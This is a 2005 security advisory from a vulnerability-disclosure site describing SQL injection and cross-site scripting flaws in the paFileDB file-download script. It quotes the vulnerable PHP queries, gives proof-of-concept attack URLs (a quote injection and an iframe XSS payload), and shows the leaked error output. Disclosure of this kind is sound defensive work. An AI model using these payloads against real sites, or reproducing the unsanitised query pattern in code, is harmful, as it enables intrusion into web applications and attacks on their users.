SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Details : SecurityReason Advisory

Arrow  Topic : SQL injection and XSS in paFileDB
Arrow  SecurityAlert : 8
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : Yes
Arrow  Exploit Given : Yes
Arrow  Credit : sp3x
Arrow  Date : 07.09.2005

Arrow  Affected Software : paFileDB x=>3.1

FREEWARE Network Scanner Security Events Montoring
Detect network vulnerabilities. Freeware dld! Monitor event logs for security. Dld 30-day eval!

Arrow  Advisory Text :  

-=[ SQL injection and XSS in paFileDB ]=-

Author: sp3x
Date: 12 March 2005

Affected software :
===================
paFileDB version : =>3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for
download on their site.
To add a download, all you do is upload the file using FTP or whatever
method you use, log
into paFileDB's admin center, and fill out a form to add a file. paFileDB
lets you edit and
delete the files too.
No more messing with a bunch of HTML pages for a file database on your
site!
Using speedy MySQL for storing data, and powerful PHP for processing
everything, paFileDB is
one of the best and easiest ways to manage files!

SQL injection:
=======================

/includes/viewall.php
/includes/category.php

Code:
---------------------------------------------------------------------------
----------------------
if ($sortby == "name") {
$result = $pafiledb_sql->query($db, "SELECT * FROM
$db[prefix]_files WHERE file_pin = '0' ORDER BY file_name ASC LIMIT
$start,20", 0);
}
if ($sortby == "date") {
$result = $pafiledb_sql->query($db, "SELECT * FROM
$db[prefix]_files WHERE file_pin = '0' ORDER BY file_time DESC LIMIT
$start,20", 0);
}
if ($sortby == "downloads") {
$result = $pafiledb_sql->query($db, "SELECT * FROM
$db[prefix]_files WHERE file_pin = '0' ORDER BY file_dls DESC LIMIT
$start,20", 0);
}
if ($sortby == "rating") {
$result = $pafiledb_sql->query($db, "SELECT * FROM
$db[prefix]_files WHERE file_pin = '0' ORDER BY
(file_rating/file_totalvotes - 1) DESC LIMIT $start,20", 0);
}
---------------------------------------------------------------------------
-----------------------

As we can see the $start variable is vuln for sql injection attack.
But this sql injection for now is not critical , why ? because if we want
to inject malicious code to sql sentence after "ORDER BY" or after "LIMIT",
then in current MySql versions, all we can do, is to fail the sql request.
No UNION-s etc. When we try to inject sql sentence we get : "Wrong usage of
UNION and ORDER BY Error number: 1221" so we must wait When Mysql version
4.1 will be widely used then we can have something like this - "ORDER BY
desc ASC LIMIT (SELECT our_table FROM pafiledb_admin)...".

Examples:
=========

Sql injection:
--------------
http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start='&sortby=r
ating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start='&sortby=
rating

error message :
---------------
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near
'\',20' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_files WHERE
file_pin = '0' ORDER BY (file_rating/file_totalvotes - 1) DESC LIMIT \',20

Also in this error message we can see the [prefix] pafiledb tables that
should be hidden :)
And we can insert XSS code in error message for example :

Cros Site Scripting (XSS):
--------------------------

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start="><iframe%
20src=http://www.securityreason.com></iframe>&sortby=rating
http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start="><iframe
%20src=http://www.securityreason.com></iframe>&sortby=date

error message :
---------------
paFileDB was unable to successfully run a MySQL query.
MySQL Returned this error: You have an error in your SQL syntax near '[Our
XSS]',20' at line 1 Error number: 1064
The query that caused this error was: SELECT * FROM pafiledb_files WHERE
file_pin = '0' ORDER BY (file_rating/file_totalvotes - 1) DESC LIMIT [Our
XSS]',20

How to fix :
============

Download the new version of the script or update.

Vendor :
========

No respond


Greetz :
========

Special greetz : cXIb8O3 , pkw :]

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server
Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability
PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
ADT

Protect your family and valuables with Home Security Systems
Copyright © SecurityReason.com. All Rights Reserved.